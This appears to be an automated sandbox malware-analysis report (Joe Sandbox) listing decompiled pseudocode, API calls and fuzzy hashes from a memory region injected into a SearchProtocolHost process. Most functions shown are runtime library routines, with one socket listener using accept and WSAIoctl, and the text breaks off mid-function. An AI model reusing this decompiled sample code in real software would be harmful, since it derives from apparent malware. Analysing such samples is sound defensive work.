                                                				if(_t181 < 0) {
                                                					_t181 = 0;
                                                				}
                                                				_t184 = _a8;
                                                				 *_t184 = 0;
                                                				E02FB4970(0,  &_v52, _t171, _a36);
                                                				_t5 = _t181 + 0xb; // 0xb
                                                				if(_a12 > _t5) {
                                                					_t172 = _a4;
                                                					_t142 = _t172[1];
                                                					_v36 =  *_t172;
                                                					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                						L11:
                                                						__eflags = _t142 & 0x80000000;
                                                						if((_t142 & 0x80000000) != 0) {
                                                							 *_t184 = 0x2d;
                                                							_t184 = _t184 + 1;
                                                							__eflags = _t184;
                                                						}
                                                						__eflags = _a28;
                                                						_v16 = 0x3ff;
                                                						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                						__eflags = _t172[1] & 0x7ff00000;
                                                						_v32 = _t136;
                                                						_t86 = 0x30;
                                                						if((_t172[1] & 0x7ff00000) != 0) {
                                                							 *_t184 = 0x31;
                                                							_t185 = _t184 + 1;
                                                							__eflags = _t185;
                                                						} else {
                                                							 *_t184 = _t86;
                                                							_t185 = _t184 + 1;
                                                							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                							__eflags = _t164;
                                                							if(_t164 != 0) {
                                                								_v16 = 0x3fe;
                                                							} else {
                                                								_v16 = _v16 & _t164;
                                                							}
                                                						}
                                                						_t146 = _t185;
                                                						_t186 = _t185 + 1;
                                                						_v28 = _t146;
                                                						__eflags = _t181;
                                                						if(_t181 != 0) {
                                                							_t30 = _v48 + 0x88; // 0xffce8305
                                                							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                						} else {
                                                							 *_t146 = 0;
                                                						}
                                                						_t92 = _t172[1] & 0x000fffff;
                                                						__eflags = _t92;
                                                						_v20 = _t92;
                                                						if(_t92 > 0) {
                                                							L23:
                                                							_t33 =  &_v8;
                                                							 *_t33 = _v8 & 0x00000000;
                                                							__eflags =  *_t33;
                                                							_t147 = 0xf0000;
                                                							_t93 = 0x30;
                                                							_v12 = _t93;
                                                							_v20 = 0xf0000;
                                                							do {
                                                								__eflags = _t181;
                                                								if(_t181 <= 0) {
                                                									break;
                                                								}
                                                								_t119 = E02FC3C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                								_t161 = 0x30;
                                                								_t121 = _t119 + _t161 & 0x0000ffff;
                                                								__eflags = _t121 - 0x39;
                                                								if(_t121 > 0x39) {
                                                									_t121 = _t121 + _t136;
                                                									__eflags = _t121;
                                                								}
                                                								_t162 = _v20;
                                                								_t172 = _a4;
                                                								 *_t186 = _t121;
                                                								_t186 = _t186 + 1;
                                                								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                								_t147 = _t162 >> 4;
                                                								_t93 = _v12 - 4;
                                                								_t181 = _t181 - 1;
                                                								_v20 = _t162 >> 4;
                                                								_v12 = _t93;
                                                								__eflags = _t93;
                                                							} while (_t93 >= 0);
                                                							__eflags = _t93;
                                                							if(_t93 < 0) {
                                                								goto L39;
                                                							}
                                                							_t115 = E02FC3C50( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                							__eflags = _t115 - 8;
                                                							if(_t115 <= 8) {
                                                								goto L39;
                                                							}
                                                							_t116 = _t186 - 1;
                                                							_t138 = 0x30;
                                                							while(1) {
                                                								_t156 =  *_t116;
                                                								__eflags = _t156 - 0x66;
                                                								if(_t156 == 0x66) {
                                                									goto L33;
                                                								}
                                                								__eflags = _t156 - 0x46;
                                                								if(_t156 != 0x46) {
                                                									_t139 = _v32;
                                                									__eflags = _t116 - _v28;
                                                									if(_t116 == _v28) {
                                                										_t57 = _t116 - 1;
                                                										 *_t57 =  *(_t116 - 1) + 1;
                                                										__eflags =  *_t57;
                                                									} else {
                                                										_t157 =  *_t116;
                                                										__eflags = _t157 - 0x39;
                                                										if(_t157 != 0x39) {
                                                											 *_t116 = _t157 + 1;
                                                										} else {
                                                											 *_t116 = _t139 + 0x3a;
                                                										}
                                                									}
                                                									goto L39;
                                                								}
                                                								L33:
                                                								 *_t116 = _t138;
                                                								_t116 = _t116 - 1;
                                                							}
                                                						} else {
                                                							__eflags =  *_t172;
                                                							if( *_t172 <= 0) {
                                                								L39:
                                                								__eflags = _t181;
                                                								if(_t181 > 0) {
                                                									_push(_t181);
                                                									_t111 = 0x30;
                                                									_push(_t111);
                                                									_push(_t186);
                                                									E02FB3440(_t181);
                                                									_t186 = _t186 + _t181;
                                                									__eflags = _t186;
                                                								}
                                                								_t94 = _v28;
                                                								__eflags =  *_t94;
                                                								if( *_t94 == 0) {
                                                									_t186 = _t94;
                                                								}
                                                								__eflags = _a28;
                                                								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								_t174 = _a4[1];
                                                								_t100 = E02FC3C50( *_a4, 0x34, _t174);
                                                								_t137 = 0;
                                                								_t151 = (_t100 & 0x000007ff) - _v16;
                                                								__eflags = _t151;
                                                								asm("sbb ebx, ebx");
                                                								if(__eflags < 0) {
                                                									L47:
                                                									 *(_t186 + 1) = 0x2d;
                                                									_t187 = _t186 + 2;
                                                									__eflags = _t187;
                                                									_t151 =  ~_t151;
                                                									asm("adc ebx, 0x0");
                                                									_t137 =  ~_t137;
                                                									goto L48;
                                                								} else {
                                                									if(__eflags > 0) {
                                                										L46:
                                                										 *(_t186 + 1) = 0x2b;
                                                										_t187 = _t186 + 2;
                                                										L48:
                                                										_t182 = _t187;
                                                										_t101 = 0x30;
                                                										 *_t187 = _t101;
                                                										__eflags = _t137;
                                                										if(__eflags < 0) {
                                                											L56:
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L60:
                                                												_push(0);
                                                												_push(0xa);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t102 = E02FC3B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t102 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												L61:
                                                												_t104 = 0x30;
                                                												_t183 = 0;
                                                												__eflags = 0;
                                                												 *_t187 = _t151 + _t104;
                                                												 *(_t187 + 1) = 0;
                                                												goto L62;
                                                											}
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L61;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L60;
                                                											}
                                                											__eflags = _t151 - 0xa;
                                                											if(_t151 < 0xa) {
                                                												goto L61;
                                                											}
                                                											goto L60;
                                                										}
                                                										if(__eflags > 0) {
                                                											L51:
                                                											_push(0);
                                                											_push(0x3e8);
                                                											_push(_t137);
                                                											_push(_t151);
                                                											_t107 = E02FC3B70();
                                                											_v32 = _t174;
                                                											 *_t187 = _t107 + 0x30;
                                                											_t187 = _t187 + 1;
                                                											__eflags = _t187 - _t182;
                                                											if(_t187 != _t182) {
                                                												L55:
                                                												_push(0);
                                                												_push(0x64);
                                                												_push(_t137);
                                                												_push(_t151);
                                                												_t109 = E02FC3B70();
                                                												_v32 = _t174;
                                                												 *_t187 = _t109 + 0x30;
                                                												_t187 = _t187 + 1;
                                                												__eflags = _t187;
                                                												goto L56;
                                                											}
                                                											L52:
                                                											__eflags = _t137;
                                                											if(__eflags < 0) {
                                                												goto L56;
                                                											}
                                                											if(__eflags > 0) {
                                                												goto L55;
                                                											}
                                                											__eflags = _t151 - 0x64;
                                                											if(_t151 < 0x64) {
                                                												goto L56;
                                                											}
                                                											goto L55;
                                                										}
                                                										__eflags = _t151 - 0x3e8;
                                                										if(_t151 < 0x3e8) {
                                                											goto L52;
                                                										}
                                                										goto L51;
                                                									}
                                                									__eflags = _t151;
                                                									if(_t151 < 0) {
                                                										goto L47;
                                                									}
                                                									goto L46;
                                                								}
                                                							}
                                                							goto L23;
                                                						}
                                                					}
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L11;
                                                					} else {
                                                						_t183 = E02FB962E(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                						__eflags = _t183;
                                                						if(_t183 == 0) {
                                                							_t128 = E02FC4330(_t184, 0x65);
                                                							_pop(_t166);
                                                							__eflags = _t128;
                                                							if(_t128 != 0) {
                                                								__eflags = _a28;
                                                								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                								__eflags = _t170;
                                                								 *_t128 = _t170;
                                                								 *((char*)(_t128 + 3)) = 0;
                                                							}
                                                							_t183 = 0;
                                                						} else {
                                                							 *_t184 = 0;
                                                						}
                                                						goto L62;
                                                					}
                                                				} else {
                                                					_t129 = E02FB5D43();
                                                					_t183 = 0x22;
                                                					 *_t129 = _t183;
                                                					E02FB5C10();
                                                					L62:
                                                					if(_v40 != 0) {
                                                						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                					}
                                                					return _t183;
                                                				}
                                                			}

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction ID: 90e57279b114d9fa0e4bc3772ae086b42b19a11bc2e45c99e85dad90eb69a4e3
                                                • Opcode Fuzzy Hash: 77f5d455d6bbc46f51ca056e9603e57878b5f4042b499e8e25835957a280ac19
                                                • Instruction Fuzzy Hash: C4A14672E446869FD7238F2AC8907EABBE5EF15394F1841ADD7859B381C3B48941CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E02FA6100(unsigned int __ecx, unsigned int __edx, signed int _a4, intOrPtr _a8) {
                                                				char _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				unsigned int _v24;
                                                				intOrPtr _v28;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t34;
                                                				signed int _t37;
                                                				void* _t40;
                                                				intOrPtr _t42;
                                                				signed int _t44;
                                                				intOrPtr _t45;
                                                				signed int _t50;
                                                				signed int _t54;
                                                				unsigned int _t58;
                                                				signed int _t59;
                                                				signed int _t66;
                                                				signed int _t72;
                                                				signed int _t75;
                                                				signed int _t80;
                                                				intOrPtr _t81;
                                                
                                                				_t68 = __edx;
                                                				_t62 = __ecx;
                                                				_push(0xffffffff);
                                                				_push(E02FC45D0);
                                                				_push( *[fs:0x0]);
                                                				_t81 = _t80 - 0xc;
                                                				_push(_t58);
                                                				_t34 =  *0x2fcf008; // 0x93ad1eea
                                                				_push(_t34 ^ _t80);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v20 = _t81;
                                                				_t75 = __ecx;
                                                				_v24 = __ecx;
                                                				_t37 = _a4;
                                                				_t72 = _t37 | 0x0000000f;
                                                				if(_t72 <= 0xfffffffe) {
                                                					_t58 =  *(__ecx + 0x14);
                                                					_t62 = _t58 >> 1;
                                                					_t68 = 0xaaaaaaab * _t72 >> 0x20 >> 1;
                                                					__eflags = _t62 - 0xaaaaaaab * _t72 >> 0x20 >> 1;
                                                					if(_t62 > 0xaaaaaaab * _t72 >> 0x20 >> 1) {
                                                						_t72 = _t62 + _t58;
                                                						__eflags = _t58 - 0xfffffffe - _t62;
                                                						if(_t58 > 0xfffffffe - _t62) {
                                                							_t72 = 0xfffffffe;
                                                						}
                                                					}
                                                				} else {
                                                					_t72 = _t37;
                                                				}
                                                				_t11 = _t72 + 1; // 0xffffffff
                                                				_t40 = _t11;
                                                				_v8 = 0;
                                                				if(_t40 != 0) {
                                                					__eflags = _t40 - 0xffffffff;
                                                					if(__eflags > 0) {
                                                						_t40 = E02FB1283(__eflags);
                                                					}
                                                					__eflags = _t40 - 0x1000;
                                                					if(__eflags < 0) {
                                                						_t59 = E02FB0A6E(_t75, __eflags, _t40);
                                                						_t81 = _t81 + 4;
                                                						__eflags = _t59;
                                                						if(__eflags != 0) {
                                                							goto L17;
                                                						} else {
                                                							E02FB5C20(_t59, _t62, _t68, _t72, __eflags);
                                                							_t50 = _a4;
                                                							_a4 = _t50;
                                                							__eflags = _t50 + 1;
                                                							_v20 = _t81;
                                                							_v8 = 2;
                                                							_v28 = E02FA6440(_t59, _t68, _t72, _t75, _t50 + 1);
                                                							return E02FA61E5;
                                                						}
                                                					} else {
                                                						_t13 = _t40 + 0x23; // 0x23
                                                						_t67 = _t13;
                                                						__eflags = _t13 - _t40;
                                                						if(__eflags <= 0) {
                                                							E02FB1283(__eflags);
                                                						}
                                                						_t54 = E02FB0A6E(_t75, __eflags, _t67);
                                                						_t81 = _t81 + 4;
                                                						__eflags = _t54;
                                                						if(__eflags == 0) {
                                                							_t54 = E02FB5C20(_t58, _t67, _t68, _t72, __eflags);
                                                						}
                                                						_t14 = _t54 + 0x23; // 0x23
                                                						_t59 = _t14 & 0xffffffe0;
                                                						 *(_t59 - 4) = _t54;
                                                						goto L17;
                                                					}
                                                				} else {
                                                					_t59 = 0;
                                                					L17:
                                                					_t42 = _a8;
                                                					if(_t42 != 0) {
                                                						if( *(_t75 + 0x14) < 0x10) {
                                                							_t66 = _t75;
                                                						} else {
                                                							_t66 =  *_t75;
                                                						}
                                                						if(_t42 != 0) {
                                                							E02FC3DB0(_t59, _t66, _t42);
                                                						}
                                                					}
                                                					_t43 =  *(_t75 + 0x14);
                                                					if( *(_t75 + 0x14) >= 0x10) {
                                                						E02FA5CF0(_t59, _t68, _t72,  *_t75, _t43 + 1);
                                                					}
                                                					 *(_t75 + 0x14) = 0xf;
                                                					 *((intOrPtr*)(_t75 + 0x10)) = 0;
                                                					if( *(_t75 + 0x14) < 0x10) {
                                                						_t44 = _t75;
                                                					} else {
                                                						_t44 =  *_t75;
                                                					}
                                                					 *_t44 = 0;
                                                					_t45 = _a8;
                                                					 *_t75 = _t59;
                                                					 *(_t75 + 0x14) = _t72;
                                                					 *((intOrPtr*)(_t75 + 0x10)) = _t45;
                                                					if( *(_t75 + 0x14) >= 0x10) {
                                                						_t75 = _t59;
                                                					}
                                                					 *((char*)(_t75 + _t45)) = 0;
                                                					 *[fs:0x0] = _v16;
                                                					return _t45;
                                                				}
                                                			}


                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 02FA617F
                                                  • Part of subcall function 02FB1283: __CxxThrowException@8.LIBVCRUNTIME ref: 02FB129A
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 02FA6192
                                                • new.LIBCMT ref: 02FA6198
                                                • new.LIBCMT ref: 02FA61B5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_task$Exception@8Throw
                                                • String ID:
                                                • API String ID: 3339364867-0
                                                • Opcode ID: a5f2f5cf07e4563e0c3dd88c99b351e6cbab617497ca0b8228092bd08521ea5b
                                                • Instruction ID: f8badaffada95ba0e4535a72870f15eee6180488b021565784b06390c0766fc3
                                                • Opcode Fuzzy Hash: a5f2f5cf07e4563e0c3dd88c99b351e6cbab617497ca0b8228092bd08521ea5b
                                                • Instruction Fuzzy Hash: 5E41E4F1E002009BEF20DF68C95076ABBEDEF05B94F540A2DEA22C7281D771D904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E02FB917C(void* __ecx) {
                                                				intOrPtr _t2;
                                                				void* _t4;
                                                				void* _t10;
                                                				void* _t11;
                                                				void* _t13;
                                                				void* _t15;
                                                				long _t16;
                                                
                                                				_t11 = __ecx;
                                                				_t16 = GetLastError();
                                                				_t10 = 0;
                                                				_t2 =  *0x2fd0558; // 0x6
                                                				_t19 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t15 = E02FB78D0(_t11, 1, 0x364);
                                                					_pop(_t13);
                                                					if(_t15 != 0) {
                                                						_t4 = E02FB7F1D(_t13, __eflags,  *0x2fd0558, _t15);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E02FB8F6A(_t13, _t15, 0x2fd6690);
                                                							E02FB7848(_t10);
                                                							__eflags = _t15;
                                                							if(_t15 != 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t15);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t10);
                                                						L4:
                                                						E02FB7848();
                                                						L8:
                                                						SetLastError(_t16);
                                                					}
                                                				} else {
                                                					_t15 = E02FB7EC7(_t11, _t19, _t2);
                                                					if(_t15 != 0) {
                                                						L9:
                                                						SetLastError(_t16);
                                                						_t10 = _t15;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                				return _t10;
                                                			}


                                                APIs
                                                • GetLastError.KERNEL32(123,77109EB0,73B76490,02FB5D48,02FB78C5,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB9181
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 02FB91EA
                                                • SetLastError.KERNEL32(00000000,?,77109EB0), ref: 02FB91F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast
                                                • String ID: 123
                                                • API String ID: 1452528299-2286445522
                                                • Opcode ID: ee3f9ae4db338364f642da10a4bdd60e55e09bb902b5aab36b79fd145c7b2c47
                                                • Instruction ID: 32172647767491657f7e3d6582128178d289e8df52060614faef7fd4920a1cb6
                                                • Opcode Fuzzy Hash: ee3f9ae4db338364f642da10a4bdd60e55e09bb902b5aab36b79fd145c7b2c47
                                                • Instruction Fuzzy Hash: E701D63BA8460526A61376376C8CFAA766FDFC17F17610428FB05E7180DFA088119D51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • accept.WS2_32(?,?,?), ref: 02FA8F96
                                                • setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 02FA8FB3
                                                • WSAIoctl.WS2_32(00000000,98000004,00000001,0000000C,00000000,00000000,00000001,00000000,00000000), ref: 02FA8FE8
                                                • new.LIBCMT ref: 02FA8FF3
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Ioctlacceptsetsockopt
                                                • String ID:
                                                • API String ID: 4090600942-0
                                                • Opcode ID: 1ac49bbec31ca5dac81196f2e982aa3f79f83823e2ed3ad6b6714be4ad36f2f1
                                                • Instruction ID: 5cb7797eb7ee0fac590d22a0161c02866a5805f7a0ab232c4a17925b743864de
                                                • Opcode Fuzzy Hash: 1ac49bbec31ca5dac81196f2e982aa3f79f83823e2ed3ad6b6714be4ad36f2f1
                                                • Instruction Fuzzy Hash: D4113DB194120CAFEB00DF94DD45FEEB7FCEB09700F200565EA05F6180D7B16A448B64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E02FB7CDE(signed int _a4) {
                                                				signed int _t9;
                                                				void* _t13;
                                                				signed int _t15;
                                                				WCHAR* _t22;
                                                				signed int _t24;
                                                				signed int* _t25;
                                                				void* _t27;
                                                
                                                				_t9 = _a4;
                                                				_t25 = 0x2fd63a8 + _t9 * 4;
                                                				_t24 =  *_t25;
                                                				if(_t24 == 0) {
                                                					_t22 =  *(0x2fc62a0 + _t9 * 4);
                                                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                                                					if(_t27 != 0) {
                                                						L8:
                                                						 *_t25 = _t27;
                                                						if( *_t25 != 0) {
                                                							FreeLibrary(_t27);
                                                						}
                                                						_t13 = _t27;
                                                						L11:
                                                						return _t13;
                                                					}
                                                					_t15 = GetLastError();
                                                					if(_t15 != 0x57) {
                                                						_t27 = 0;
                                                					} else {
                                                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                                                						_t27 = _t15;
                                                					}
                                                					if(_t27 != 0) {
                                                						goto L8;
                                                					} else {
                                                						 *_t25 = _t15 | 0xffffffff;
                                                						_t13 = 0;
                                                						goto L11;
                                                					}
                                                				}
                                                				_t4 = _t24 + 1; // 0x93ad1eeb
                                                				asm("sbb eax, eax");
                                                				return  ~_t4 & _t24;
                                                			}











                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,02FA9C60,00000000,00000000,?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue), ref: 02FB7D10
                                                • GetLastError.KERNEL32(?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue,02FC6784,02FC678C,00000000,00000364,?,02FB91CA), ref: 02FB7D1C
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,02FB7C85,02FA9C60,00000000,00000000,00000000,?,02FB7F44,00000006,FlsSetValue,02FC6784,02FC678C,00000000), ref: 02FB7D2A
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID:
                                                • API String ID: 3177248105-0
                                                • Opcode ID: 7fa35be23534ea82b7668719750b703ab0de36785790ffbd3e37ae2370d742dc
                                                • Instruction ID: 4fe36d5db872c9d5b336830d2a04a38aae37a52ac41c2e269e717b20bff4efc1
                                                • Opcode Fuzzy Hash: 7fa35be23534ea82b7668719750b703ab0de36785790ffbd3e37ae2370d742dc
                                                • Instruction Fuzzy Hash: 5601F033F452265BD722596ADC44AA6F7989F897E1B610920FF07E72C0D730D410C7D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E02FB0F6C(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t4;
                                                				void* _t6;
                                                				void* _t13;
                                                				void* _t15;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t28;
                                                
                                                				_t30 = __edi;
                                                				_t29 = __edx;
                                                				_t25 = __ecx;
                                                				_t24 = __ebx;
                                                				_push(__esi);
                                                				E02FB6EAF(1);
                                                				E02FB730F(E02FB173B());
                                                				_t4 = E02FB7536();
                                                				 *_t4 = E02FB1741();
                                                				_t6 = E02FB0B8C(__edx, __edi, _t4, 1);
                                                				_t37 = _t6;
                                                				if(_t6 == 0) {
                                                					L5:
                                                					E02FB1477(_t29, _t30, 7);
                                                					asm("int3");
                                                					E02FB1777();
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					asm("fclex");
                                                					E02FB17AC();
                                                					E02FB0D30(_t37, E02FB17D7);
                                                					_push(E02FB1737());
                                                					_t13 = E02FB7237(_t25, __edx);
                                                					_pop(_t27);
                                                					if(_t13 != 0) {
                                                						goto L5;
                                                					} else {
                                                						E02FB1744(_t13);
                                                						_t15 = E02FB1794();
                                                						_t39 = _t15;
                                                						if(_t15 != 0) {
                                                							_t15 = E02FB6F34(E02FB1741);
                                                							_pop(_t27);
                                                						}
                                                						E02FB1802(E02FB1802(_t15));
                                                						E02FB1750(_t29, _t30, _t39);
                                                						E02FB749F(_t27, _t29, E02FB1741());
                                                						_pop(_t28);
                                                						L02FB6986(_t24, _t28);
                                                						E02FB1741();
                                                						return 0;
                                                					}
                                                				}
                                                			}












                                                APIs
                                                • ___scrt_initialize_onexit_tables.LIBCMT ref: 02FB0F8F
                                                • __RTC_Initialize.LIBCMT ref: 02FB0F9E
                                                  • Part of subcall function 02FB0D30: __onexit.LIBCMT ref: 02FB0D36
                                                  • Part of subcall function 02FB1744: InitializeSListHead.KERNEL32(02FD6158,02FB0FC3), ref: 02FB1749
                                                • ___scrt_fastfail.LIBCMT ref: 02FB1001
                                                • ___scrt_initialize_default_local_stdio_options.LIBCMT ref: 02FB1007
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Initialize$HeadList___scrt_fastfail___scrt_initialize_default_local_stdio_options___scrt_initialize_onexit_tables__onexit
                                                • String ID:
                                                • API String ID: 3692885319-0
                                                • Opcode ID: 52f51654b21ec248a410c0b949f5f635ab1272e23b95f75f5f631d0b0aab68eb
                                                • Instruction ID: 052afcdb5d2031ce3879cf218f6f44d38adcd4d5acdc9ecd093e98f4c09138f6
                                                • Opcode Fuzzy Hash: 52f51654b21ec248a410c0b949f5f635ab1272e23b95f75f5f631d0b0aab68eb
                                                • Instruction Fuzzy Hash: DCF04462A6030AA4EA1333F35D7AADF728B4F417E5F340818A75D9B880EE69D0444CB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E02FA6440(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
                                                				intOrPtr* _v0;
                                                				intOrPtr* _v12;
                                                				void* __ebp;
                                                				signed int _t21;
                                                				intOrPtr* _t27;
                                                				signed int _t30;
                                                				signed int _t34;
                                                				void* _t35;
                                                				intOrPtr _t36;
                                                				signed int _t38;
                                                				intOrPtr* _t39;
                                                				void* _t40;
                                                				intOrPtr* _t41;
                                                				intOrPtr* _t42;
                                                				void* _t43;
                                                				intOrPtr _t44;
                                                				void* _t46;
                                                				intOrPtr* _t47;
                                                				void* _t51;
                                                
                                                				_t46 = __esi;
                                                				_t43 = __edi;
                                                				_t40 = __edx;
                                                				_t35 = __ebx;
                                                				_t21 = _a4;
                                                				if(_t21 != 0) {
                                                					__eflags = _t21 - 0xffffffff;
                                                					if(__eflags > 0) {
                                                						E02FB1283(__eflags);
                                                						goto L10;
                                                					} else {
                                                						__eflags = _t21 - 0x1000;
                                                						if(__eflags < 0) {
                                                							_t21 = E02FB0A6E(__esi, __eflags, _t21);
                                                							_t51 = _t51 + 4;
                                                							__eflags = _t21;
                                                							if(__eflags != 0) {
                                                								goto L1;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t2 = _t21 + 0x23; // 0x2fa61ff
                                                							_t38 = _t2;
                                                							__eflags = _t38 - _t21;
                                                							if(__eflags <= 0) {
                                                								L10:
                                                								E02FB1283(__eflags);
                                                								goto L11;
                                                							} else {
                                                								_t38 = E02FB0A6E(__esi, __eflags, _t38);
                                                								_t51 = _t51 + 4;
                                                								__eflags = _t38;
                                                								if(__eflags == 0) {
                                                									L11:
                                                									E02FB5C20(_t35, _t38, _t40, _t43, __eflags);
                                                									L12:
                                                									E02FB5C20(_t35, _t38, _t40, _t43, __eflags);
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									asm("int3");
                                                									_push(_t38);
                                                									_t41 =  *0x2fd6a54;
                                                									_push(_t46);
                                                									_v12 = _t41;
                                                									_t47 =  *((intOrPtr*)(_t41 + 4));
                                                									__eflags =  *((char*)(_t47 + 0xd));
                                                									if( *((char*)(_t47 + 0xd)) == 0) {
                                                										_t27 = _v0;
                                                										_push(_t35);
                                                										_push(_t43);
                                                										_t9 = _t27 + 0x10; // 0x458be85d
                                                										_t36 =  *_t9;
                                                										do {
                                                											__eflags =  *((intOrPtr*)(_t27 + 0x14)) - 0x10;
                                                											_t39 = _t47 + 0x10;
                                                											if( *((intOrPtr*)(_t27 + 0x14)) < 0x10) {
                                                												_t42 = _t27;
                                                											} else {
                                                												_t42 =  *_t27;
                                                											}
                                                											__eflags =  *((intOrPtr*)(_t39 + 0x14)) - 0x10;
                                                											_t44 =  *((intOrPtr*)(_t39 + 0x10));
                                                											if( *((intOrPtr*)(_t39 + 0x14)) >= 0x10) {
                                                												_t39 =  *_t39;
                                                											}
                                                											__eflags = _t44 - _t36;
                                                											_t29 =  <  ? _t44 : _t36;
                                                											_t30 = E02FA51A0(_t39, _t42,  <  ? _t44 : _t36);
                                                											_t51 = _t51 + 4;
                                                											__eflags = _t30;
                                                											if(__eflags != 0) {
                                                												L23:
                                                												if(__eflags < 0) {
                                                													goto L25;
                                                												} else {
                                                													_t41 = _t47;
                                                													_t47 =  *_t47;
                                                													_v12 = _t41;
                                                												}
                                                											} else {
                                                												__eflags = _t44 - _t36;
                                                												if(_t44 < _t36) {
                                                													L25:
                                                													_t47 =  *((intOrPtr*)(_t47 + 8));
                                                													_t41 = _v12;
                                                												} else {
